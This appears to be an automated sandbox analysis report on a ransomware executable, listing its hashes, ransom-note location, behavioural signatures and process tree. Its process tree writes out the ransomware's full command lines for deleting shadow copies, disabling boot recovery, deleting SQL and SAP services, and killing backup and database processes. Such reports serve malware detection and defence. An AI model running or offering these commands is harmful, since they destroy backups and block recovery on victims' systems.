Analysis
-
max time kernel
142s -
max time network
188s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
14-10-2022 13:00
Behavioral task
behavioral1
Sample
4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe
Resource
win10v2004-20220812-en
General
-
Target
4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe
-
Size
159KB
-
MD5
121ec45315b1cc9d73c9f44fad976694
-
SHA1
18f1fce2a63883d4eb5e796fc946094dbd948894
-
SHA256
4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6
-
SHA512
fa592d7c282d3e726197d6b9207f61fb0cef56e2a3534fbded16269d293af522bc0e93d8107137edb8ffe2ed2ff94357d824ca84c24c8b4c9d6f6696f071170e
-
SSDEEP
3072:vfCpcDozERHWkC1rd3CC5UB5KvSS0+9Pzo9p04/t9LU5Uht9e8A+BVfRbixpJ+L:vfCpc/RHcQC50e0QPCiEtVvthA7g
Malware Config
Extracted
C:\$Recycle.Bin\S-1-5-21-2295526160-1155304984-640977766-1000\RECOVERY FILES.txt
https://twitter.com/mallox_leaks
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\E: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\N: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\T: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\U: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\V: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\Z: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\F: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\J: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\O: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\S: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\W: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\H: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\I: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\K: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\M: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\Q: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\X: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\B: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\G: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\L: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\P: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\R: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened (read-only) \??\Y: 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\zh-CN\View3d\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\commerce\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\AppxMetadata\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\VideoLAN\VLC\locale\be\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\MLModels\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\Microsoft Office 15\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fi-fi\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-applemenu.xml 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\hu\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\ScreenSketchAppService\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ar-ae\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\7-Zip\descript.ion 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\microsoft.system.package.metadata\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Views\Utilities\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\uk-ua\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ar-ae\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\cs-cz\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\locimages\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Images\contrast-standard\theme-dark\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\x64\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pt_BR.jar 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\1033\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fa-IR\View3d\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\uz-Latn-UZ\View3d\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\RECOVERY FILES.txt 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1924 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4944 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe Token: SeDebugPrivilege 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe Token: SeBackupPrivilege 4120 vssvc.exe Token: SeRestorePrivilege 4120 vssvc.exe Token: SeAuditPrivilege 4120 vssvc.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 4852 wrote to memory of 1056 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 80 PID 4852 wrote to memory of 1056 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 80 PID 4852 wrote to memory of 1056 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 80 PID 4852 wrote to memory of 4944 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 81 PID 4852 wrote to memory of 4944 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 81 PID 4852 wrote to memory of 4392 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 82 PID 4852 wrote to memory of 4392 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 82 PID 4852 wrote to memory of 4392 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 82 PID 4852 wrote to memory of 5080 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 86 PID 4852 wrote to memory of 5080 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 86 PID 4852 wrote to memory of 5080 4852 4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe 86 PID 1056 wrote to memory of 1924 1056 cmd.exe 88 PID 1056 wrote to memory of 1924 1056 cmd.exe 88 PID 1056 wrote to memory of 1924 1056 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe"C:\Users\Admin\AppData\Local\Temp\4075d6e02c022ee45e0cd1c826abf749200639ee8ebc42375dac2430abafb5d6.exe"1⤵
- Checks computer location settings
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete MsDtsServer100&&sc delete MSSQL$SOPHOS&&sc delete MSSQLFDLauncher&&sc delete MSSQLSERVER&&sc delete MSSQLServerADHelper100&&sc delete MSSQLServerOLAPService&&sc delete ReportServer&&sc delete SQLAgent$SOPHOS&&sc delete "SQLANYs_sem5"&&sc delete SQLBrowser&&sc delete SQLSERVERAGENT&&sc delete SQLWriter&&sc delete B1LicenseService&&sc delete b1s50000&&sc delete b1s50001&&sc delete b1s50002&&sc delete B1ServerTools&&sc delete B1ServerTools64&&sc delete B1Workflow&&sc delete COMSysApp&&sc delete Gatekeeper64&&sc delete isapnp&&sc delete "SAP Business One RSP Agent Service"&&sc delete SBOClientAgent&&sc delete "SBODI_Server"&&sc delete SBOMail&&sc delete SBOWFDataAccess&&taskkill /f /im db*&&taskkill /f /im apache*&&taskkill /f /im mysql*&&taskkill /f /im Notifier*&&taskkill /f /im IBM*&&taskkill /f /im copy*&&taskkill /f /im store*&&taskkill /f /im sql*&&taskkill /f /im vee*&&taskkill /f /im wrsa*&&taskkill /f /im postg*&&taskkill /f /im sage*&&taskkill /f /im msdt*&&taskkill /f /im ora*&&taskkill /f /im microsoft*&&taskkill /f /im backup*&&taskkill /f /im http*&&taskkill /f /im office*&&taskkill /f /im cube*&&taskkill /f /im team*&&taskkill /f /im b1*&&taskkill /f /im sbo*&&taskkill /f /im reporting*&&taskkill /f /im sav*&&taskkill /f /im fd*&&taskkill /f /im microsoft*&&net stop MSSQLFDLauncher&&net stop MSSQLServerOLAPService&&net stop ReportServer2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\sc.exesc delete MsDtsServer1003⤵
- Launches sc.exe
PID:1924
-
-
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4944
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵PID:4392
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no2⤵PID:5080
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4120